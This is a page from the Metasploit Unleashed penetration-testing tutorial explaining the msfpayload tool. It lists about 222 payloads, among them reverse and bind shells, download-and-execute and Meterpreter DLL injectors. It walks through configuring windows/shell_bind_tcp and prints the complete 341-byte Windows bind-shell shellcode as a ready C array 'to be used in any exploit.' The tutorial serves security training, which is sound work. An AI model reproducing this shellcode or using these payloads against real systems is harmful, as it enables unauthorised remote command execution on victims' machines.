Msfpayload

From Metasploit Unleashed - Mastering The Framework

Jump to: navigation, search

msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.

This tool has many different options and variables available to it, but they may not all be fully realized given the limited output in the help banner. 

root@bt:~# msfpayload -h

    Usage: /pentest/exploits/framework3/msfpayload []  [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

    -h        Help banner
    -l        List available payloads

How powerful this tool can be is fully seen when showing the vast number of different types of shellcode that are available to be customized for your specific exploit: 

root@bt:~# msfpayload -l

Framework Payloads (222 total)
==============================

    Name                                             Description
    ----                                             -----------
    aix/ppc/shell_bind_tcp                           Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                          Spawn a shell on an established connection
    aix/ppc/shell_interact                           Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    bsd/sparc/shell_bind_tcp                         Listen for a connection and spawn a command shell
    bsd/sparc/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    bsd/x86/exec                                     Execute an arbitrary command
    bsd/x86/metsvc_bind_tcp                          Stub payload for interacting with a Meterpreter Service
    bsd/x86/metsvc_reverse_tcp                       Stub payload for interacting with a Meterpreter Service
    bsd/x86/shell/bind_tcp                           Listen for a connection, Spawn a command shell (staged)
    bsd/x86/shell/find_tag                           Use an established connection, Spawn a command shell (staged)
    bsd/x86/shell/reverse_tcp                        Connect back to the attacker, Spawn a command shell (staged)
    bsd/x86/shell_bind_tcp                           Listen for a connection and spawn a command shell
    bsd/x86/shell_find_port                          Spawn a shell on an established connection
    bsd/x86/shell_find_tag                           Spawn a shell on an established connection (proxy/nat safe)
    bsd/x86/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    bsdi/x86/shell/bind_tcp                          Listen for a connection, Spawn a command shell (staged)
    bsdi/x86/shell/reverse_tcp                       Connect back to the attacker, Spawn a command shell (staged)
    bsdi/x86/shell_bind_tcp                          Listen for a connection and spawn a command shell
    bsdi/x86/shell_find_port                         Spawn a shell on an established connection
    bsdi/x86/shell_reverse_tcp                       Connect back to attacker and spawn a command shell
    cmd/unix/bind_inetd                              Listen for a connection and spawn a command shell (persistent)
    cmd/unix/bind_netcat                             Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_perl                               Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_ruby                               Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/generic                                 Executes the supplied command
    cmd/unix/interact                                Interacts with a shell on an established socket connection
    cmd/unix/reverse                                 Creates an interactive shell through two inbound connections
    cmd/unix/reverse_bash                            
				Creates an interactive shell via bash's builtin /dev/tcp.
				This will not work on most Debian-based Linux distributions
				(including Ubuntu) because they compile bash without the
				/dev/tcp feature.
				
    cmd/unix/reverse_netcat                          Creates an interactive shell via netcat
    cmd/unix/reverse_perl                            Creates an interactive shell via perl
    cmd/unix/reverse_ruby                            Connect back and create a command shell via Ruby
    cmd/windows/adduser                              Create a new user and add them to local administration group
    cmd/windows/bind_perl                            Listen for a connection and spawn a command shell via perl (persistent)
    cmd/windows/bind_ruby                            Continually listen for a connection and spawn a command shell via Ruby
    cmd/windows/download_exec_vbs                    Download an EXE from an HTTP(S) URL and execute it
    cmd/windows/reverse_perl                         Creates an interactive shell via perl
    cmd/windows/reverse_ruby                         Connect back and create a command shell via Ruby
    generic/debug_trap                               Generate a debug trap in the target process
    generic/shell_bind_tcp                           Listen for a connection and spawn a command shell
    generic/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    generic/tight_loop                               Generate a tight loop in the target process
    java/jsp_shell_bind_tcp                          Listen for a connection and spawn a command shell
    java/jsp_shell_reverse_tcp                       Connect back to attacker and spawn a command shell
    java/meterpreter/bind_tcp                        Listen for a connection, Run a meterpreter server in Java
    java/meterpreter/reverse_tcp                     Connect back stager, Run a meterpreter server in Java
    java/shell/bind_tcp                              Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
    java/shell/reverse_tcp                           Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
    linux/armle/adduser                              Create a new user with UID 0
    linux/armle/exec                                 Execute an arbitrary command
    linux/armle/shell_reverse_tcp                    Connect back to attacker and spawn a command shell
    linux/mipsbe/shell_reverse_tcp                   Connect back to attacker and spawn a command shell
    linux/mipsle/shell_reverse_tcp                   Connect back to attacker and spawn a command shell
    linux/ppc/shell_bind_tcp                         Listen for a connection and spawn a command shell
    linux/ppc/shell_find_port                        Spawn a shell on an established connection
    linux/ppc/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    linux/ppc64/shell_bind_tcp                       Listen for a connection and spawn a command shell
    linux/ppc64/shell_find_port                      Spawn a shell on an established connection
    linux/ppc64/shell_reverse_tcp                    Connect back to attacker and spawn a command shell
    linux/x64/exec                                   Execute an arbitrary command
    linux/x64/shell/bind_tcp                         Listen for a connection, Spawn a command shell (staged)
    linux/x64/shell/reverse_tcp                      Connect back to the attacker, Spawn a command shell (staged)
    linux/x64/shell_bind_tcp                         Listen for a connection and spawn a command shell
    linux/x64/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    linux/x86/adduser                                Create a new user with UID 0
    linux/x86/chmod                                  Runs chmod on specified file with specified mode
    linux/x86/exec                                   Execute an arbitrary command
    linux/x86/meterpreter/bind_ipv6_tcp              Listen for a connection over IPv6, Staged meterpreter server
    linux/x86/meterpreter/bind_tcp                   Listen for a connection, Staged meterpreter server
    linux/x86/meterpreter/find_tag                   Use an established connection, Staged meterpreter server
    linux/x86/meterpreter/reverse_ipv6_tcp           Connect back to attacker over IPv6, Staged meterpreter server
    linux/x86/meterpreter/reverse_tcp                Connect back to the attacker, Staged meterpreter server
    linux/x86/metsvc_bind_tcp                        Stub payload for interacting with a Meterpreter Service
    linux/x86/metsvc_reverse_tcp                     Stub payload for interacting with a Meterpreter Service
    linux/x86/shell/bind_ipv6_tcp                    Listen for a connection over IPv6, Spawn a command shell (staged)
    linux/x86/shell/bind_tcp                         Listen for a connection, Spawn a command shell (staged)
    linux/x86/shell/find_tag                         Use an established connection, Spawn a command shell (staged)
    linux/x86/shell/reverse_ipv6_tcp                 Connect back to attacker over IPv6, Spawn a command shell (staged)
    linux/x86/shell/reverse_tcp                      Connect back to the attacker, Spawn a command shell (staged)
    linux/x86/shell_bind_ipv6_tcp                    Listen for a connection over IPv6 and spawn a command shell
    linux/x86/shell_bind_tcp                         Listen for a connection and spawn a command shell
    linux/x86/shell_find_port                        Spawn a shell on an established connection
    linux/x86/shell_find_tag                         Spawn a shell on an established connection (proxy/nat safe)
    linux/x86/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    linux/x86/shell_reverse_tcp2                     Connect back to attacker and spawn a command shell
    netware/shell/reverse_tcp                        Connect back to the attacker, Connect to the NetWare console (staged)
    osx/armle/execute/bind_tcp                       Listen for a connection, Spawn a command shell (staged)
    osx/armle/execute/reverse_tcp                    Connect back to the attacker, Spawn a command shell (staged)
    osx/armle/shell/bind_tcp                         Listen for a connection, Spawn a command shell (staged)
    osx/armle/shell/reverse_tcp                      Connect back to the attacker, Spawn a command shell (staged)
    osx/armle/shell_bind_tcp                         Listen for a connection and spawn a command shell
    osx/armle/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    osx/armle/vibrate                                
				Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded.
				Based on work by Charlie Miller .
			
    osx/ppc/shell/bind_tcp                           Listen for a connection, Spawn a command shell (staged)
    osx/ppc/shell/find_tag                           Use an established connection, Spawn a command shell (staged)
    osx/ppc/shell/reverse_tcp                        Connect back to the attacker, Spawn a command shell (staged)
    osx/ppc/shell_bind_tcp                           Listen for a connection and spawn a command shell
    osx/ppc/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    osx/x86/bundleinject/bind_tcp                    Listen, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
    osx/x86/bundleinject/reverse_tcp                 Connect, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
    osx/x86/exec                                     Execute an arbitrary command
    osx/x86/isight/bind_tcp                          Listen, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
    osx/x86/isight/reverse_tcp                       Connect, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
    osx/x86/shell_bind_tcp                           Listen for a connection and spawn a command shell
    osx/x86/shell_find_port                          Spawn a shell on an established connection
    osx/x86/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    osx/x86/vforkshell/bind_tcp                      Listen, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
    osx/x86/vforkshell/reverse_tcp                   Connect, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
    osx/x86/vforkshell_bind_tcp                      Listen for a connection, vfork if necessary, and spawn a command shell
    osx/x86/vforkshell_reverse_tcp                   Connect back to attacker, vfork if necessary, and spawn a command shell
    php/bind_perl                                    Listen for a connection and spawn a command shell via perl (persistent)
    php/bind_php                                     Listen for a connection and spawn a command shell via php
    php/download_exec                                Download an EXE from an HTTP URL and execute it
    php/exec                                         Execute a single system command
    php/meterpreter/bind_tcp                         Listen for a connection, Run a meterpreter server in PHP
    php/meterpreter/reverse_tcp                      Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP
    php/meterpreter_reverse_tcp                      Connect back to attacker and spawn a Meterpreter server (PHP)
    php/reverse_perl                                 Creates an interactive shell via perl
    php/reverse_php                                  Reverse PHP connect back shell with checks for disabled functions
    php/shell_findsock                               
				Spawn a shell on the established connection to
				the webserver.  Unfortunately, this payload
				can leave conspicuous evil-looking entries in the
				apache error logs, so it is probably a good idea
				to use a bind or reverse shell unless firewalls
				prevent them from working.  The issue this
				payload takes advantage of (CLOEXEC flag not set
				on sockets) appears to have been patched on the
				Ubuntu version of Apache and may not work on
				other Debian-based distributions.  Only tested on
				Apache but it might work on other web servers
				that leak file descriptors to child processes.
				
    solaris/sparc/shell_bind_tcp                     Listen for a connection and spawn a command shell
    solaris/sparc/shell_find_port                    Spawn a shell on an established connection
    solaris/sparc/shell_reverse_tcp                  Connect back to attacker and spawn a command shell
    solaris/x86/shell_bind_tcp                       Listen for a connection and spawn a command shell
    solaris/x86/shell_find_port                      Spawn a shell on an established connection
    solaris/x86/shell_reverse_tcp                    Connect back to attacker and spawn a command shell
    tty/unix/interact                                Interacts with a TTY on an established socket connection
    windows/adduser                                  Create a new user and add them to local administration group
    windows/dllinject/bind_ipv6_tcp                  Listen for a connection over IPv6, Inject a Dll via a reflective loader
    windows/dllinject/bind_nonx_tcp                  Listen for a connection (No NX), Inject a Dll via a reflective loader
    windows/dllinject/bind_tcp                       Listen for a connection, Inject a Dll via a reflective loader
    windows/dllinject/find_tag                       Use an established connection, Inject a Dll via a reflective loader
    windows/dllinject/reverse_http                   Tunnel communication over HTTP using IE 6, Inject a Dll via a reflective loader
    windows/dllinject/reverse_ipv6_tcp               Connect back to the attacker over IPv6, Inject a Dll via a reflective loader
    windows/dllinject/reverse_nonx_tcp               Connect back to the attacker (No NX), Inject a Dll via a reflective loader
    windows/dllinject/reverse_ord_tcp                Connect back to the attacker, Inject a Dll via a reflective loader
    windows/dllinject/reverse_tcp                    Connect back to the attacker, Inject a Dll via a reflective loader
    windows/dllinject/reverse_tcp_allports           Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a Dll via a reflective loader
    windows/dllinject/reverse_tcp_dns                Connect back to the attacker, Inject a Dll via a reflective loader
    windows/download_exec                            Download an EXE from an HTTP URL and execute it
    windows/exec                                     Execute an arbitrary command
    windows/messagebox                               Spawns a dialog via MessageBox using a customizable title, text & icon
    windows/meterpreter/bind_ipv6_tcp                Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/bind_nonx_tcp                Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/bind_tcp                     Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/find_tag                     Use an established connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_http                 Tunnel communication over HTTP using IE 6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_https                Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_ipv6_tcp             Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_nonx_tcp             Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_ord_tcp              Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_tcp                  Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_tcp_allports         Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_tcp_dns              Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/metsvc_bind_tcp                          Stub payload for interacting with a Meterpreter Service
    windows/metsvc_reverse_tcp                       Stub payload for interacting with a Meterpreter Service
    windows/patchupdllinject/bind_ipv6_tcp           Listen for a connection over IPv6, Inject a custom DLL into the exploited process
    windows/patchupdllinject/bind_nonx_tcp           Listen for a connection (No NX), Inject a custom DLL into the exploited process
    windows/patchupdllinject/bind_tcp                Listen for a connection, Inject a custom DLL into the exploited process
    windows/patchupdllinject/find_tag                Use an established connection, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_ipv6_tcp        Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_nonx_tcp        Connect back to the attacker (No NX), Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_ord_tcp         Connect back to the attacker, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_tcp             Connect back to the attacker, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_tcp_allports    Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_tcp_dns         Connect back to the attacker, Inject a custom DLL into the exploited process
    windows/patchupmeterpreter/bind_ipv6_tcp         Listen for a connection over IPv6, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/bind_nonx_tcp         Listen for a connection (No NX), Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/bind_tcp              Listen for a connection, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/find_tag              Use an established connection, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_ipv6_tcp      Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_nonx_tcp      Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_ord_tcp       Connect back to the attacker, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_tcp           Connect back to the attacker, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_tcp_dns       Connect back to the attacker, Inject the meterpreter server DLL (staged)
    windows/shell/bind_ipv6_tcp                      Listen for a connection over IPv6, Spawn a piped command shell (staged)
    windows/shell/bind_nonx_tcp                      Listen for a connection (No NX), Spawn a piped command shell (staged)
    windows/shell/bind_tcp                           Listen for a connection, Spawn a piped command shell (staged)
    windows/shell/find_tag                           Use an established connection, Spawn a piped command shell (staged)
    windows/shell/reverse_http                       Tunnel communication over HTTP using IE 6, Spawn a piped command shell (staged)
    windows/shell/reverse_ipv6_tcp                   Connect back to the attacker over IPv6, Spawn a piped command shell (staged)
    windows/shell/reverse_nonx_tcp                   Connect back to the attacker (No NX), Spawn a piped command shell (staged)
    windows/shell/reverse_ord_tcp                    Connect back to the attacker, Spawn a piped command shell (staged)
    windows/shell/reverse_tcp                        Connect back to the attacker, Spawn a piped command shell (staged)
    windows/shell/reverse_tcp_allports               Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged)
    windows/shell/reverse_tcp_dns                    Connect back to the attacker, Spawn a piped command shell (staged)
    windows/shell_bind_tcp                           Listen for a connection and spawn a command shell
    windows/shell_bind_tcp_xpfw                      Disable the Windows ICF, then listen for a connection and spawn a command shell
    windows/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    windows/speak_pwned                              Causes the target to say "You Got Pwned" via the Windows Speech API
    windows/upexec/bind_ipv6_tcp                     Listen for a connection over IPv6, Uploads an executable and runs it (staged)
    windows/upexec/bind_nonx_tcp                     Listen for a connection (No NX), Uploads an executable and runs it (staged)
    windows/upexec/bind_tcp                          Listen for a connection, Uploads an executable and runs it (staged)
    windows/upexec/find_tag                          Use an established connection, Uploads an executable and runs it (staged)
    windows/upexec/reverse_http                      Tunnel communication over HTTP using IE 6, Uploads an executable and runs it (staged)
    windows/upexec/reverse_ipv6_tcp                  Connect back to the attacker over IPv6, Uploads an executable and runs it (staged)
    windows/upexec/reverse_nonx_tcp                  Connect back to the attacker (No NX), Uploads an executable and runs it (staged)
    windows/upexec/reverse_ord_tcp                   Connect back to the attacker, Uploads an executable and runs it (staged)
    windows/upexec/reverse_tcp                       Connect back to the attacker, Uploads an executable and runs it (staged)
    windows/upexec/reverse_tcp_allports              Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged)
    windows/upexec/reverse_tcp_dns                   Connect back to the attacker, Uploads an executable and runs it (staged)
    windows/vncinject/bind_ipv6_tcp                  Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/bind_nonx_tcp                  Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/bind_tcp                       Listen for a connection, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/find_tag                       Use an established connection, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_http                   Tunnel communication over HTTP using IE 6, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_ipv6_tcp               Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_nonx_tcp               Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_ord_tcp                Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_tcp                    Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_tcp_allports           Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_tcp_dns                Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
    windows/x64/exec                                 Execute an arbitrary command (Windows x64)
    windows/x64/meterpreter/bind_tcp                 Listen for a connection (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
    windows/x64/meterpreter/reverse_tcp              Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
    windows/x64/shell/bind_tcp                       Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell/reverse_tcp                    Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell_bind_tcp                       Listen for a connection and spawn a command shell (Windows x64)
    windows/x64/shell_reverse_tcp                    Connect back to attacker and spawn a command shell (Windows x64)
    windows/x64/vncinject/bind_tcp                   Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
    windows/x64/vncinject/reverse_tcp                Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)

Once you have selected a payload, there are two switches that are used most often when crafting the payload for the exploit you are creating. In the example below we have selected a simple Windows bind shell. When we add the command-line argument "O" with that payload, we get all of the available configurable options for that payload. 

root@bt:~# msfpayload windows/shell_bind_tcp O

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902 
  sf 

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell

As we can see from the output, we can configure three different options with this specific payload, if they are required, if they come with any default settings, and a short description:

  • EXITFUNC
    • Required
    • Default setting: process
  • LPORT
    • Required
    • Default setting: 4444
  • RHOST
    • Not required
    • No default setting


Setting these options in msfpayload is very simple. An example is shown below of changing the exit technique and listening port of the shell: 

root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 O

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902 
  sf 

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
LPORT     1234             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell

Now that all of that is configured, the only option left is to specify the output type such as C, Perl, Raw, etc. For this example we are going to output our shellcode as C: 

root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C
/*
 * windows/shell_bind_tcp - 341 bytes
 * http://www.metasploit.com
 * LPORT=1234, RHOST=, EXITFUNC=seh, InitialAutoRunScript=,
 * AutoRunScript=
 */
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xfe\x0e\x32\xea"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

Now we have our fully customized shellcode to be used in any exploit!

Exploit Payloads



Retrieved from "http://www.offensive-security.com/metasploit-unleashed/Msfpayload"
Personal tools